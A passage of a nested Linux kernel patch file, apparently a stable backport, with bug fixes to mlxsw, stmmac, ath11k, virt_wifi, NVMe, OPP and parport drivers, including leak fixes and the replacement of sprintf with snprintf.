+ 	u16 fdir_fltr_cnt[ICE_FLTR_PTYPE_MAX][ICE_FD_HW_SEG_MAX];
+ 	int prof_entry_cnt[ICE_FLTR_PTYPE_MAX][ICE_FD_HW_SEG_MAX];
++	u16 fdir_fltr_cnt_total;
+ 	struct ice_fd_hw_prof **fdir_prof;
+ 
+ 	struct idr fdir_rule_idr;
+diff --git a/drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_atcam.c b/drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_atcam.c
+index 4b713832fdd55..f5c0a4214c4e5 100644
+--- a/drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_atcam.c
++++ b/drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_atcam.c
+@@ -391,7 +391,8 @@ mlxsw_sp_acl_atcam_region_entry_insert(struct mlxsw_sp *mlxsw_sp,
+ 	if (err)
+ 		return err;
+ 
+-	lkey_id = aregion->ops->lkey_id_get(aregion, aentry->enc_key, erp_id);
++	lkey_id = aregion->ops->lkey_id_get(aregion, aentry->ht_key.enc_key,
++					    erp_id);
+ 	if (IS_ERR(lkey_id))
+ 		return PTR_ERR(lkey_id);
+ 	aentry->lkey_id = lkey_id;
+@@ -399,7 +400,7 @@ mlxsw_sp_acl_atcam_region_entry_insert(struct mlxsw_sp *mlxsw_sp,
+ 	kvdl_index = mlxsw_afa_block_first_kvdl_index(rulei->act_block);
+ 	mlxsw_reg_ptce3_pack(ptce3_pl, true, MLXSW_REG_PTCE3_OP_WRITE_WRITE,
+ 			     priority, region->tcam_region_info,
+-			     aentry->enc_key, erp_id,
++			     aentry->ht_key.enc_key, erp_id,
+ 			     aentry->delta_info.start,
+ 			     aentry->delta_info.mask,
+ 			     aentry->delta_info.value,
+@@ -428,7 +429,7 @@ mlxsw_sp_acl_atcam_region_entry_remove(struct mlxsw_sp *mlxsw_sp,
+ 
+ 	mlxsw_reg_ptce3_pack(ptce3_pl, false, MLXSW_REG_PTCE3_OP_WRITE_WRITE, 0,
+ 			     region->tcam_region_info,
+-			     aentry->enc_key, erp_id,
++			     aentry->ht_key.enc_key, erp_id,
+ 			     aentry->delta_info.start,
+ 			     aentry->delta_info.mask,
+ 			     aentry->delta_info.value,
+@@ -457,7 +458,7 @@ mlxsw_sp_acl_atcam_region_entry_action_replace(struct mlxsw_sp *mlxsw_sp,
+ 	kvdl_index = mlxsw_afa_block_first_kvdl_index(rulei->act_block);
+ 	mlxsw_reg_ptce3_pack(ptce3_pl, true, MLXSW_REG_PTCE3_OP_WRITE_UPDATE,
+ 			     priority, region->tcam_region_info,
+-			     aentry->enc_key, erp_id,
++			     aentry->ht_key.enc_key, erp_id,
+ 			     aentry->delta_info.start,
+ 			     aentry->delta_info.mask,
+ 			     aentry->delta_info.value,
+@@ -480,15 +481,13 @@ __mlxsw_sp_acl_atcam_entry_add(struct mlxsw_sp *mlxsw_sp,
+ 	int err;
+ 
+ 	mlxsw_afk_encode(afk, region->key_info, &rulei->values,
+-			 aentry->ht_key.full_enc_key, mask);
++			 aentry->ht_key.enc_key, mask);
+ 
+ 	erp_mask = mlxsw_sp_acl_erp_mask_get(aregion, mask, false);
+ 	if (IS_ERR(erp_mask))
+ 		return PTR_ERR(erp_mask);
+ 	aentry->erp_mask = erp_mask;
+ 	aentry->ht_key.erp_id = mlxsw_sp_acl_erp_mask_erp_id(erp_mask);
+-	memcpy(aentry->enc_key, aentry->ht_key.full_enc_key,
+-	       sizeof(aentry->enc_key));
+ 
+ 	/* Compute all needed delta information and clear the delta bits
+ 	 * from the encrypted key.
+@@ -497,9 +496,8 @@ __mlxsw_sp_acl_atcam_entry_add(struct mlxsw_sp *mlxsw_sp,
+ 	aentry->delta_info.start = mlxsw_sp_acl_erp_delta_start(delta);
+ 	aentry->delta_info.mask = mlxsw_sp_acl_erp_delta_mask(delta);
+ 	aentry->delta_info.value =
+-		mlxsw_sp_acl_erp_delta_value(delta,
+-					     aentry->ht_key.full_enc_key);
+-	mlxsw_sp_acl_erp_delta_clear(delta, aentry->enc_key);
++		mlxsw_sp_acl_erp_delta_value(delta, aentry->ht_key.enc_key);
++	mlxsw_sp_acl_erp_delta_clear(delta, aentry->ht_key.enc_key);
+ 
+ 	/* Add rule to the list of A-TCAM rules, assuming this
+ 	 * rule is intended to A-TCAM. In case this rule does
+diff --git a/drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_bloom_filter.c b/drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_bloom_filter.c
+index 95f63fcf4ba1f..a54eedb69a3f5 100644
+--- a/drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_bloom_filter.c
++++ b/drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_bloom_filter.c
+@@ -249,7 +249,7 @@ __mlxsw_sp_acl_bf_key_encode(struct mlxsw_sp_acl_atcam_region *aregion,
+ 		memcpy(chunk + pad_bytes, &erp_region_id,
+ 		       sizeof(erp_region_id));
+ 		memcpy(chunk + key_offset,
+-		       &aentry->enc_key[chunk_key_offsets[chunk_index]],
++		       &aentry->ht_key.enc_key[chunk_key_offsets[chunk_index]],
+ 		       chunk_key_len);
+ 		chunk += chunk_len;
+ 	}
+diff --git a/drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_erp.c b/drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_erp.c
+index d231f4d2888be..9eee229303cce 100644
+--- a/drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_erp.c
++++ b/drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_erp.c
+@@ -1217,18 +1217,6 @@ static bool mlxsw_sp_acl_erp_delta_check(void *priv, const void *parent_obj,
+ 	return err ? false : true;
+ }
+ 
+-static int mlxsw_sp_acl_erp_hints_obj_cmp(const void *obj1, const void *obj2)
+-{
+-	const struct mlxsw_sp_acl_erp_key *key1 = obj1;
+-	const struct mlxsw_sp_acl_erp_key *key2 = obj2;
+-
+-	/* For hints purposes, two objects are considered equal
+-	 * in case the masks are the same. Does not matter what
+-	 * the "ctcam" value is.
+-	 */
+-	return memcmp(key1->mask, key2->mask, sizeof(key1->mask));
+-}
+-
+ static void *mlxsw_sp_acl_erp_delta_create(void *priv, void *parent_obj,
+ 					   void *obj)
+ {
+@@ -1308,7 +1296,6 @@ static void mlxsw_sp_acl_erp_root_destroy(void *priv, void *root_priv)
+ static const struct objagg_ops mlxsw_sp_acl_erp_objagg_ops = {
+ 	.obj_size = sizeof(struct mlxsw_sp_acl_erp_key),
+ 	.delta_check = mlxsw_sp_acl_erp_delta_check,
+-	.hints_obj_cmp = mlxsw_sp_acl_erp_hints_obj_cmp,
+ 	.delta_create = mlxsw_sp_acl_erp_delta_create,
+ 	.delta_destroy = mlxsw_sp_acl_erp_delta_destroy,
+ 	.root_create = mlxsw_sp_acl_erp_root_create,
+diff --git a/drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_tcam.h b/drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_tcam.h
+index edbbc89e7a719..24ba15d8b4168 100644
+--- a/drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_tcam.h
++++ b/drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_tcam.h
+@@ -171,9 +171,9 @@ struct mlxsw_sp_acl_atcam_region {
+ };
+ 
+ struct mlxsw_sp_acl_atcam_entry_ht_key {
+-	char full_enc_key[MLXSW_REG_PTCEX_FLEX_KEY_BLOCKS_LEN]; /* Encoded
+-								 * key.
+-								 */
++	char enc_key[MLXSW_REG_PTCEX_FLEX_KEY_BLOCKS_LEN]; /* Encoded key, minus
++							    * delta bits.
++							    */
+ 	u8 erp_id;
+ };
+ 
+@@ -185,9 +185,6 @@ struct mlxsw_sp_acl_atcam_entry {
+ 	struct rhash_head ht_node;
+ 	struct list_head list; /* Member in entries_list */
+ 	struct mlxsw_sp_acl_atcam_entry_ht_key ht_key;
+-	char enc_key[MLXSW_REG_PTCEX_FLEX_KEY_BLOCKS_LEN]; /* Encoded key,
+-							    * minus delta bits.
+-							    */
+ 	struct {
+ 		u16 start;
+ 		u8 mask;
+diff --git a/drivers/net/ethernet/stmicro/stmmac/dwmac4_core.c b/drivers/net/ethernet/stmicro/stmmac/dwmac4_core.c
+index 39112d5cb5b80..687eb17e41c6e 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/dwmac4_core.c
++++ b/drivers/net/ethernet/stmicro/stmmac/dwmac4_core.c
+@@ -971,7 +971,7 @@ static void dwmac4_set_mac_loopback(void __iomem *ioaddr, bool enable)
+ }
+ 
+ static void dwmac4_update_vlan_hash(struct mac_device_info *hw, u32 hash,
+-				    __le16 perfect_match, bool is_double)
++				    u16 perfect_match, bool is_double)
+ {
+ 	void __iomem *ioaddr = hw->pcsr;
+ 	u32 value;
+diff --git a/drivers/net/ethernet/stmicro/stmmac/dwxgmac2_core.c b/drivers/net/ethernet/stmicro/stmmac/dwxgmac2_core.c
+index dd73f38ec08d8..813327d04c56f 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/dwxgmac2_core.c
++++ b/drivers/net/ethernet/stmicro/stmmac/dwxgmac2_core.c
+@@ -582,7 +582,7 @@ static int dwxgmac2_rss_configure(struct mac_device_info *hw,
+ }
+ 
+ static void dwxgmac2_update_vlan_hash(struct mac_device_info *hw, u32 hash,
+-				      __le16 perfect_match, bool is_double)
++				      u16 perfect_match, bool is_double)
+ {
+ 	void __iomem *ioaddr = hw->pcsr;
+ 
+diff --git a/drivers/net/ethernet/stmicro/stmmac/hwif.h b/drivers/net/ethernet/stmicro/stmmac/hwif.h
+index b2b9cf04bc726..820e2251b7c88 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/hwif.h
++++ b/drivers/net/ethernet/stmicro/stmmac/hwif.h
+@@ -366,7 +366,7 @@ struct stmmac_ops {
+ 			     struct stmmac_rss *cfg, u32 num_rxq);
+ 	/* VLAN */
+ 	void (*update_vlan_hash)(struct mac_device_info *hw, u32 hash,
+-				 __le16 perfect_match, bool is_double);
++				 u16 perfect_match, bool is_double);
+ 	void (*enable_vlan)(struct mac_device_info *hw, u32 type);
+ 	int (*add_hw_vlan_rx_fltr)(struct net_device *dev,
+ 				   struct mac_device_info *hw,
+diff --git a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
+index e2d51014ab4bc..93630840309e7 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
++++ b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
+@@ -6311,7 +6311,7 @@ static u32 stmmac_vid_crc32_le(__le16 vid_le)
+ static int stmmac_vlan_update(struct stmmac_priv *priv, bool is_double)
+ {
+ 	u32 crc, hash = 0;
+-	__le16 pmatch = 0;
++	u16 pmatch = 0;
+ 	int count = 0;
+ 	u16 vid = 0;
+ 
+@@ -6326,7 +6326,7 @@ static int stmmac_vlan_update(struct stmmac_priv *priv, bool is_double)
+ 		if (count > 2) /* VID = 0 always passes filter */
+ 			return -EOPNOTSUPP;
+ 
+-		pmatch = cpu_to_le16(vid);
++		pmatch = vid;
+ 		hash = 0;
+ 	}
+ 
+diff --git a/drivers/net/netconsole.c b/drivers/net/netconsole.c
+index bdff9ac5056dd..1e797f1ddc31c 100644
+--- a/drivers/net/netconsole.c
++++ b/drivers/net/netconsole.c
+@@ -716,6 +716,7 @@ static int netconsole_netdev_event(struct notifier_block *this,
+ 				/* rtnl_lock already held
+ 				 * we might sleep in __netpoll_cleanup()
+ 				 */
++				nt->enabled = false;
+ 				spin_unlock_irqrestore(&target_list_lock, flags);
+ 
+ 				__netpoll_cleanup(&nt->np);
+@@ -723,7 +724,6 @@ static int netconsole_netdev_event(struct notifier_block *this,
+ 				spin_lock_irqsave(&target_list_lock, flags);
+ 				netdev_put(nt->np.dev, &nt->np.dev_tracker);
+ 				nt->np.dev = NULL;
+-				nt->enabled = false;
+ 				stopped = true;
+ 				netconsole_target_put(nt);
+ 				goto restart;
+diff --git a/drivers/net/wireless/ath/ath11k/dp_rx.c b/drivers/net/wireless/ath/ath11k/dp_rx.c
+index b1067bcdf88a5..3746f9c956969 100644
+--- a/drivers/net/wireless/ath/ath11k/dp_rx.c
++++ b/drivers/net/wireless/ath/ath11k/dp_rx.c
+@@ -1879,8 +1879,7 @@ static void ath11k_dp_rx_h_csum_offload(struct ath11k *ar, struct sk_buff *msdu)
+ 			  CHECKSUM_NONE : CHECKSUM_UNNECESSARY;
+ }
+ 
+-static int ath11k_dp_rx_crypto_mic_len(struct ath11k *ar,
+-				       enum hal_encrypt_type enctype)
++int ath11k_dp_rx_crypto_mic_len(struct ath11k *ar, enum hal_encrypt_type enctype)
+ {
+ 	switch (enctype) {
+ 	case HAL_ENCRYPT_TYPE_OPEN:
+diff --git a/drivers/net/wireless/ath/ath11k/dp_rx.h b/drivers/net/wireless/ath/ath11k/dp_rx.h
+index 623da3bf9dc81..c322e30caa968 100644
+--- a/drivers/net/wireless/ath/ath11k/dp_rx.h
++++ b/drivers/net/wireless/ath/ath11k/dp_rx.h
+@@ -1,6 +1,7 @@
+ /* SPDX-License-Identifier: BSD-3-Clause-Clear */
+ /*
+  * Copyright (c) 2018-2019 The Linux Foundation. All rights reserved.
++ * Copyright (c) 2024 Qualcomm Innovation Center, Inc. All rights reserved.
+  */
+ #ifndef ATH11K_DP_RX_H
+ #define ATH11K_DP_RX_H
+@@ -95,4 +96,6 @@ int ath11k_peer_rx_frag_setup(struct ath11k *ar, const u8 *peer_mac, int vdev_id
+ int ath11k_dp_rx_pktlog_start(struct ath11k_base *ab);
+ int ath11k_dp_rx_pktlog_stop(struct ath11k_base *ab, bool stop_timer);
+ 
++int ath11k_dp_rx_crypto_mic_len(struct ath11k *ar, enum hal_encrypt_type enctype);
++
+ #endif /* ATH11K_DP_RX_H */
+diff --git a/drivers/net/wireless/ath/ath11k/mac.c b/drivers/net/wireless/ath/ath11k/mac.c
+index b863ead198bda..8234e34269ed8 100644
+--- a/drivers/net/wireless/ath/ath11k/mac.c
++++ b/drivers/net/wireless/ath/ath11k/mac.c
+@@ -3748,6 +3748,7 @@ static int ath11k_install_key(struct ath11k_vif *arvif,
+ 
+ 	switch (key->cipher) {
+ 	case WLAN_CIPHER_SUITE_CCMP:
++	case WLAN_CIPHER_SUITE_CCMP_256:
+ 		arg.key_cipher = WMI_CIPHER_AES_CCM;
+ 		/* TODO: Re-check if flag is valid */
+ 		key->flags |= IEEE80211_KEY_FLAG_GENERATE_IV_MGMT;
+@@ -3757,12 +3758,10 @@ static int ath11k_install_key(struct ath11k_vif *arvif,
+ 		arg.key_txmic_len = 8;
+ 		arg.key_rxmic_len = 8;
+ 		break;
+-	case WLAN_CIPHER_SUITE_CCMP_256:
+-		arg.key_cipher = WMI_CIPHER_AES_CCM;
+-		break;
+ 	case WLAN_CIPHER_SUITE_GCMP:
+ 	case WLAN_CIPHER_SUITE_GCMP_256:
+ 		arg.key_cipher = WMI_CIPHER_AES_GCM;
++		key->flags |= IEEE80211_KEY_FLAG_GENERATE_IV_MGMT;
+ 		break;
+ 	default:
+ 		ath11k_warn(ar->ab, "cipher %d is not supported\n", key->cipher);
+@@ -5542,7 +5541,10 @@ static int ath11k_mac_mgmt_tx_wmi(struct ath11k *ar, struct ath11k_vif *arvif,
+ {
+ 	struct ath11k_base *ab = ar->ab;
+ 	struct ieee80211_hdr *hdr = (struct ieee80211_hdr *)skb->data;
++	struct ath11k_skb_cb *skb_cb = ATH11K_SKB_CB(skb);
+ 	struct ieee80211_tx_info *info;
++	enum hal_encrypt_type enctype;
++	unsigned int mic_len;
+ 	dma_addr_t paddr;
+ 	int buf_id;
+ 	int ret;
+@@ -5566,7 +5568,12 @@ static int ath11k_mac_mgmt_tx_wmi(struct ath11k *ar, struct ath11k_vif *arvif,
+ 		     ieee80211_is_deauth(hdr->frame_control) ||
+ 		     ieee80211_is_disassoc(hdr->frame_control)) &&
+ 		     ieee80211_has_protected(hdr->frame_control)) {
+-			skb_put(skb, IEEE80211_CCMP_MIC_LEN);
++			if (!(skb_cb->flags & ATH11K_SKB_CIPHER_SET))
++				ath11k_warn(ab, "WMI management tx frame without ATH11K_SKB_CIPHER_SET");
++
++			enctype = ath11k_dp_tx_get_encrypt_type(skb_cb->cipher);
++			mic_len = ath11k_dp_rx_crypto_mic_len(ar, enctype);
++			skb_put(skb, mic_len);
+ 		}
+ 	}
+ 
+diff --git a/drivers/net/wireless/broadcom/brcm80211/brcmsmac/phy/phy_lcn.c b/drivers/net/wireless/broadcom/brcm80211/brcmsmac/phy/phy_lcn.c
+index 7717eb85a1db6..47c0e8e429e54 100644
+--- a/drivers/net/wireless/broadcom/brcm80211/brcmsmac/phy/phy_lcn.c
++++ b/drivers/net/wireless/broadcom/brcm80211/brcmsmac/phy/phy_lcn.c
+@@ -2567,7 +2567,6 @@ wlc_lcnphy_tx_iqlo_cal(struct brcms_phy *pi,
+ 
+ 	struct lcnphy_txgains cal_gains, temp_gains;
+ 	u16 hash;
+-	u8 band_idx;
+ 	int j;
+ 	u16 ncorr_override[5];
+ 	u16 syst_coeffs[] = { 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+@@ -2599,6 +2598,9 @@ wlc_lcnphy_tx_iqlo_cal(struct brcms_phy *pi,
+ 	u16 *values_to_save;
+ 	struct brcms_phy_lcnphy *pi_lcn = pi->u.pi_lcnphy;
+ 
++	if (WARN_ON(CHSPEC_IS5G(pi->radio_chanspec)))
++		return;
++
+ 	values_to_save = kmalloc_array(20, sizeof(u16), GFP_ATOMIC);
+ 	if (NULL == values_to_save)
+ 		return;
+@@ -2662,20 +2664,18 @@ wlc_lcnphy_tx_iqlo_cal(struct brcms_phy *pi,
+ 	hash = (target_gains->gm_gain << 8) |
+ 	       (target_gains->pga_gain << 4) | (target_gains->pad_gain);
+ 
+-	band_idx = (CHSPEC_IS5G(pi->radio_chanspec) ? 1 : 0);
+-
+ 	cal_gains = *target_gains;
+ 	memset(ncorr_override, 0, sizeof(ncorr_override));
+-	for (j = 0; j < iqcal_gainparams_numgains_lcnphy[band_idx]; j++) {
+-		if (hash == tbl_iqcal_gainparams_lcnphy[band_idx][j][0]) {
++	for (j = 0; j < iqcal_gainparams_numgains_lcnphy[0]; j++) {
++		if (hash == tbl_iqcal_gainparams_lcnphy[0][j][0]) {
+ 			cal_gains.gm_gain =
+-				tbl_iqcal_gainparams_lcnphy[band_idx][j][1];
++				tbl_iqcal_gainparams_lcnphy[0][j][1];
+ 			cal_gains.pga_gain =
+-				tbl_iqcal_gainparams_lcnphy[band_idx][j][2];
++				tbl_iqcal_gainparams_lcnphy[0][j][2];
+ 			cal_gains.pad_gain =
+-				tbl_iqcal_gainparams_lcnphy[band_idx][j][3];
++				tbl_iqcal_gainparams_lcnphy[0][j][3];
+ 			memcpy(ncorr_override,
+-			       &tbl_iqcal_gainparams_lcnphy[band_idx][j][3],
++			       &tbl_iqcal_gainparams_lcnphy[0][j][3],
+ 			       sizeof(ncorr_override));
+ 			break;
+ 		}
+diff --git a/drivers/net/wireless/marvell/mwifiex/cfg80211.c b/drivers/net/wireless/marvell/mwifiex/cfg80211.c
+index c907da2a4789a..d1b23dba5ad50 100644
+--- a/drivers/net/wireless/marvell/mwifiex/cfg80211.c
++++ b/drivers/net/wireless/marvell/mwifiex/cfg80211.c
+@@ -926,6 +926,8 @@ mwifiex_init_new_priv_params(struct mwifiex_private *priv,
+ 		return -EOPNOTSUPP;
+ 	}
+ 
++	priv->bss_num = mwifiex_get_unused_bss_num(adapter, priv->bss_type);
++
+ 	spin_lock_irqsave(&adapter->main_proc_lock, flags);
+ 	adapter->main_locked = false;
+ 	spin_unlock_irqrestore(&adapter->main_proc_lock, flags);
+diff --git a/drivers/net/wireless/realtek/rtw89/debug.c b/drivers/net/wireless/realtek/rtw89/debug.c
+index 3a8fe60d0bb7b..0e014d6afb842 100644
+--- a/drivers/net/wireless/realtek/rtw89/debug.c
++++ b/drivers/net/wireless/realtek/rtw89/debug.c
+@@ -2386,7 +2386,7 @@ static void rtw89_sta_info_get_iter(void *data, struct ieee80211_sta *sta)
+ 	case RX_ENC_HE:
+ 		seq_printf(m, "HE %dSS MCS-%d GI:%s", status->nss, status->rate_idx,
+ 			   status->he_gi <= NL80211_RATE_INFO_HE_GI_3_2 ?
+-			   he_gi_str[rate->he_gi] : "N/A");
++			   he_gi_str[status->he_gi] : "N/A");
+ 		break;
+ 	}
+ 	seq_printf(m, "\t(hw_rate=0x%x)\n", rtwsta->rx_hw_rate);
+diff --git a/drivers/net/wireless/virt_wifi.c b/drivers/net/wireless/virt_wifi.c
+index ba14d83353a4b..fb4d95a027fef 100644
+--- a/drivers/net/wireless/virt_wifi.c
++++ b/drivers/net/wireless/virt_wifi.c
+@@ -136,6 +136,9 @@ static struct ieee80211_supported_band band_5ghz = {
+ /* Assigned at module init. Guaranteed locally-administered and unicast. */
+ static u8 fake_router_bssid[ETH_ALEN] __ro_after_init = {};
+ 
++#define VIRT_WIFI_SSID "VirtWifi"
++#define VIRT_WIFI_SSID_LEN 8
++
+ static void virt_wifi_inform_bss(struct wiphy *wiphy)
+ {
+ 	u64 tsf = div_u64(ktime_get_boottime_ns(), 1000);
+@@ -146,8 +149,8 @@ static void virt_wifi_inform_bss(struct wiphy *wiphy)
+ 		u8 ssid[8];
+ 	} __packed ssid = {
+ 		.tag = WLAN_EID_SSID,
+-		.len = 8,
+-		.ssid = "VirtWifi",
++		.len = VIRT_WIFI_SSID_LEN,
++		.ssid = VIRT_WIFI_SSID,
+ 	};
+ 
+ 	informed_bss = cfg80211_inform_bss(wiphy, &channel_5ghz,
+@@ -213,6 +216,8 @@ struct virt_wifi_netdev_priv {
+ 	struct net_device *upperdev;
+ 	u32 tx_packets;
+ 	u32 tx_failed;
++	u32 connect_requested_ssid_len;
++	u8 connect_requested_ssid[IEEE80211_MAX_SSID_LEN];
+ 	u8 connect_requested_bss[ETH_ALEN];
+ 	bool is_up;
+ 	bool is_connected;
+@@ -229,6 +234,12 @@ static int virt_wifi_connect(struct wiphy *wiphy, struct net_device *netdev,
+ 	if (priv->being_deleted || !priv->is_up)
+ 		return -EBUSY;
+ 
++	if (!sme->ssid)
++		return -EINVAL;
++
++	priv->connect_requested_ssid_len = sme->ssid_len;
++	memcpy(priv->connect_requested_ssid, sme->ssid, sme->ssid_len);
++
+ 	could_schedule = schedule_delayed_work(&priv->connect, HZ * 2);
+ 	if (!could_schedule)
+ 		return -EBUSY;
+@@ -252,12 +263,15 @@ static void virt_wifi_connect_complete(struct work_struct *work)
+ 		container_of(work, struct virt_wifi_netdev_priv, connect.work);
+ 	u8 *requested_bss = priv->connect_requested_bss;
+ 	bool right_addr = ether_addr_equal(requested_bss, fake_router_bssid);
++	bool right_ssid = priv->connect_requested_ssid_len == VIRT_WIFI_SSID_LEN &&
++			  !memcmp(priv->connect_requested_ssid, VIRT_WIFI_SSID,
++				  priv->connect_requested_ssid_len);
+ 	u16 status = WLAN_STATUS_SUCCESS;
+ 
+ 	if (is_zero_ether_addr(requested_bss))
+ 		requested_bss = NULL;
+ 
+-	if (!priv->is_up || (requested_bss && !right_addr))
++	if (!priv->is_up || (requested_bss && !right_addr) || !right_ssid)
+ 		status = WLAN_STATUS_UNSPECIFIED_FAILURE;
+ 	else
+ 		priv->is_connected = true;
+diff --git a/drivers/nvme/host/pci.c b/drivers/nvme/host/pci.c
+index 32e89ea853a47..27446fa847526 100644
+--- a/drivers/nvme/host/pci.c
++++ b/drivers/nvme/host/pci.c
+@@ -910,7 +910,8 @@ static blk_status_t nvme_prep_rq(struct nvme_dev *dev, struct request *req)
+ 	blk_mq_start_request(req);
+ 	return BLK_STS_OK;
+ out_unmap_data:
+-	nvme_unmap_data(dev, req);
++	if (blk_rq_nr_phys_segments(req))
++		nvme_unmap_data(dev, req);
+ out_free_cmd:
+ 	nvme_cleanup_cmd(req);
+ 	return ret;
+@@ -1322,7 +1323,7 @@ static void nvme_warn_reset(struct nvme_dev *dev, u32 csts)
+ 	dev_warn(dev->ctrl.device,
+ 		 "Does your device have a faulty power saving mode enabled?\n");
+ 	dev_warn(dev->ctrl.device,
+-		 "Try \"nvme_core.default_ps_max_latency_us=0 pcie_aspm=off\" and report a bug\n");
++		 "Try \"nvme_core.default_ps_max_latency_us=0 pcie_aspm=off pcie_port_pm=off\" and report a bug\n");
+ }
+ 
+ static enum blk_eh_timer_return nvme_timeout(struct request *req)
+diff --git a/drivers/nvme/target/auth.c b/drivers/nvme/target/auth.c
+index e900525b78665..aacc05ec00c2b 100644
+--- a/drivers/nvme/target/auth.c
++++ b/drivers/nvme/target/auth.c
+@@ -314,7 +314,7 @@ int nvmet_auth_host_hash(struct nvmet_req *req, u8 *response,
+ 						    req->sq->dhchap_c1,
+ 						    challenge, shash_len);
+ 		if (ret)
+-			goto out_free_response;
++			goto out_free_challenge;
+ 	}
+ 
+ 	pr_debug("ctrl %d qid %d host response seq %u transaction %d\n",
+@@ -325,7 +325,7 @@ int nvmet_auth_host_hash(struct nvmet_req *req, u8 *response,
+ 			GFP_KERNEL);
+ 	if (!shash) {
+ 		ret = -ENOMEM;
+-		goto out_free_response;
++		goto out_free_challenge;
+ 	}
+ 	shash->tfm = shash_tfm;
+ 	ret = crypto_shash_init(shash);
+@@ -361,9 +361,10 @@ int nvmet_auth_host_hash(struct nvmet_req *req, u8 *response,
+ 		goto out;
+ 	ret = crypto_shash_final(shash, response);
+ out:
++	kfree(shash);
++out_free_challenge:
+ 	if (challenge != req->sq->dhchap_c1)
+ 		kfree(challenge);
+-	kfree(shash);
+ out_free_response:
+ 	kfree_sensitive(host_response);
+ out_free_tfm:
+@@ -426,14 +427,14 @@ int nvmet_auth_ctrl_hash(struct nvmet_req *req, u8 *response,
+ 						    req->sq->dhchap_c2,
+ 						    challenge, shash_len);
+ 		if (ret)
+-			goto out_free_response;
++			goto out_free_challenge;
+ 	}
+ 
+ 	shash = kzalloc(sizeof(*shash) + crypto_shash_descsize(shash_tfm),
+ 			GFP_KERNEL);
+ 	if (!shash) {
+ 		ret = -ENOMEM;
+-		goto out_free_response;
++		goto out_free_challenge;
+ 	}
+ 	shash->tfm = shash_tfm;
+ 
+@@ -470,9 +471,10 @@ int nvmet_auth_ctrl_hash(struct nvmet_req *req, u8 *response,
+ 		goto out;
+ 	ret = crypto_shash_final(shash, response);
+ out:
++	kfree(shash);
++out_free_challenge:
+ 	if (challenge != req->sq->dhchap_c2)
+ 		kfree(challenge);
+-	kfree(shash);
+ out_free_response:
+ 	kfree_sensitive(ctrl_response);
+ out_free_tfm:
+diff --git a/drivers/opp/ti-opp-supply.c b/drivers/opp/ti-opp-supply.c
+index 8f3f13fbbb25a..a8a696d2e03ab 100644
+--- a/drivers/opp/ti-opp-supply.c
++++ b/drivers/opp/ti-opp-supply.c
+@@ -400,10 +400,12 @@ static int ti_opp_supply_probe(struct platform_device *pdev)
+ 	}
+ 
+ 	ret = dev_pm_opp_set_config_regulators(cpu_dev, ti_opp_config_regulators);
+-	if (ret < 0)
++	if (ret < 0) {
+ 		_free_optimized_voltages(dev, &opp_data);
++		return ret;
++	}
+ 
+-	return ret;
++	return 0;
+ }
+ 
+ static struct platform_driver ti_opp_supply_driver = {
+diff --git a/drivers/parport/procfs.c b/drivers/parport/procfs.c
+index d740eba3c0999..8400a379186ea 100644
+--- a/drivers/parport/procfs.c
++++ b/drivers/parport/procfs.c
+@@ -51,12 +51,12 @@ static int do_active_device(struct ctl_table *table, int write,
+ 	
+ 	for (dev = port->devices; dev ; dev = dev->next) {
+ 		if(dev == port->cad) {
+-			len += sprintf(buffer, "%s\n", dev->name);
++			len += snprintf(buffer, sizeof(buffer), "%s\n", dev->name);
+ 		}
+ 	}
+ 
+ 	if(!len) {
+-		len += sprintf(buffer, "%s\n", "none");
++		len += snprintf(buffer, sizeof(buffer), "%s\n", "none");
+ 	}
+ 
+ 	if (len > *lenp)
+@@ -87,19 +87,19 @@ static int do_autoprobe(struct ctl_table *table, int write,
+ 	}
+ 	
+ 	if ((str = info->class_name) != NULL)
+-		len += sprintf (buffer + len, "CLASS:%s;\n", str);
++		len += snprintf (buffer + len, sizeof(buffer) - len, "CLASS:%s;\n", str);
+ 
+ 	if ((str = info->model) != NULL)
+-		len += sprintf (buffer + len, "MODEL:%s;\n", str);
++		len += snprintf (buffer + len, sizeof(buffer) - len, "MODEL:%s;\n", str);
+ 
+ 	if ((str = info->mfr) != NULL)
+-		len += sprintf (buffer + len, "MANUFACTURER:%s;\n", str);
++		len += snprintf (buffer + len, sizeof(buffer) - len, "MANUFACTURER:%s;\n", str);
+ 
+ 	if ((str = info->description) != NULL)
+-		len += sprintf (buffer + len, "DESCRIPTION:%s;\n", str);
++		len += snprintf (buffer + len, sizeof(buffer) - len, "DESCRIPTION:%s;\n", str);
+ 
+ 	if ((str = info->cmdset) != NULL)
+-		len += sprintf (buffer + len, "COMMAND SET:%s;\n", str);
++		len += snprintf (buffer + len, sizeof(buffer) - len, "COMMAND SET:%s;\n", str);
+ 
+ 	if (len > *lenp)
+ 		len = *lenp;
+@@ -117,7 +117,7 @@ static int do_hardware_base_addr(struct ctl_table *table, int write,
+ 				 void *result, size_t *lenp, loff_t *ppos)
+ {
+ 	struct parport *port = (struct parport *)table->extra1;
+-	char buffer[20];
++	char buffer[64];
+ 	int len = 0;
+ 
+ 	if (*ppos) {
+@@ -128,7 +128,7 @@ static int do_hardware_base_addr(struct ctl_table *table, int write,
+ 	if (write) /* permissions prevent this anyway */
+ 		return -EACCES;
+ 
+-	len += sprintf (buffer, "%lu\t%lu\n", port->base, port->base_hi);
++	len += snprintf (buffer, sizeof(buffer), "%lu\t%lu\n", port->base, port->base_hi);
+ 
